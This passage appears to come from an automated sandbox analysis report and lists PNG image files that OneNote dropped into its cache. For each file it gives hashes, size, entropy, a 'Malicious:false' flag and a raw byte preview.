                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000049.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004B.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004C.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004D.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004E.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004F.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004G.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004H.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004I.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004J.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004K.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

